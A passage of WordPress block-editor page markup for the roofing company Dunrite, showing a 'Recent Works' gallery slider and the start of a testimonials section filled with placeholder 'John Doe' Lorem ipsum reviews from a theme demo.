class=\"skt-blocks-advanced-column-child block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"783eb3b3-d1c3-49b9-90d8-afecee322852\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-783eb3b3-d1c3-49b9-90d8-afecee322852\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"69e7b669-5987-43ca-8d08-f4e800640f8e\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-69e7b669-5987-43ca-8d08-f4e800640f8e skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"5e6e58f8-acdc-4281-9713-b2c98a4e716d\"} -->\n<style type=\"text/css\"> .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5e6e58f8-acdc-4281-9713-b2c98a4e716d\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"ca90f3dd-ac39-45a1-b448-4f4d323edecb\"} -->\n<style type=\"text/css\"> .block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"424cb1af-2a1b-4163-a4f3-8d11acf339b8\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2caf698d-f57b-4edb-a3c6-802f06514e20\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2caf698d-f57b-4edb-a3c6-802f06514e20\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy 